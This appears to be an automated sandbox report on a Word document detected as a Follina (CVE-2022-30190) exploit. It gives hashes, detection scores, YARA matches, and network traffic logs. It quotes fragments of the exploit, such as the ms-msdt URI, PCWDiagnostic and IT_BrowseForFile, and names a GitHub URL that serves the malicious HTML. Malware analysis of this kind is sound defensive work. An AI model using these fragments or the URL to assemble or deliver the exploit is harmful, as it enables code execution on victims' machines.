Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dl18aYTBo5.docx

Overview

General Information

Sample Name:dl18aYTBo5.docx
Analysis ID:686004
MD5:b91615355a11f5bb8b7c381a8bc4485a
SHA1:7950b1730e05a2dcdd19f1a98a697798a9edbf77
SHA256:3fdd30eb0961c98259d58327745ec253588b1553d9822d613d45d076c4b07ec1
Infos:

Detection

Follina CVE-2022-30190
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 5828 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5700 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x77c:$a2: TargetMode="External"
  • 0x774:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x703:$olerel: relationships/oleObject
  • 0x71c:$target1: Target="http
  • 0x77c:$mode: TargetMode="External
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x3d19a:$a: PCWDiagnostic
  • 0x44b3e:$a: PCWDiagnostic
  • 0x48342:$a: PCWDiagnostic
  • 0x3d18e:$sa3: ms-msdt
  • 0x44b32:$sa3: ms-msdt
  • 0x48336:$sa3: ms-msdt
  • 0x3d20d:$sb3: IT_BrowseForFile=
  • 0x44bb1:$sb3: IT_BrowseForFile=
  • 0x483b5:$sb3: IT_BrowseForFile=
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txtSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x1efa:$a: PCWDiagnostic
    • 0x1eee:$sa3: ms-msdt
    • 0x1f6d:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txtEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x1edd:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txtJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].htmlSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x1efa:$a: PCWDiagnostic
      • 0x1eee:$sa3: ms-msdt
      • 0x1f6d:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].htmlEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x1edd:$re1: location.href = "ms-msdt:
      Click to see the 7 entries
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: dl18aYTBo5.docxAvira: detected
      Source: dl18aYTBo5.docxVirustotal: Detection: 50%Perma Link
      Source: dl18aYTBo5.docxMetadefender: Detection: 20%Perma Link
      Source: dl18aYTBo5.docxReversingLabs: Detection: 27%
      Source: https://raw.githubusercontent.com/drgreenthumb93/CVE-2022-30190-follina/main/bad.htmlVirustotal: Detection: 5%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].htmlAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].htmlAvira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, type: DROPPED
      Source: document.xml.relsExtracted files from sample: https://raw.githubusercontent.com/drgreenthumb93/cve-2022-30190-follina/main/bad.html!
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49707 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49704
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49705
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49706
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49707
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49708
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49708
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49708
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49708
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49708
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49708
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49708
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49709
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49709
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49709
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49709
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49709
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49709
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49709
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49710
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 185.199.108.133:443 -> 192.168.2.4:49711
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49712
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49713
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49713
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49713
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49713
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49713
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49713
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49713
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49714
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49714
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49714
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49714
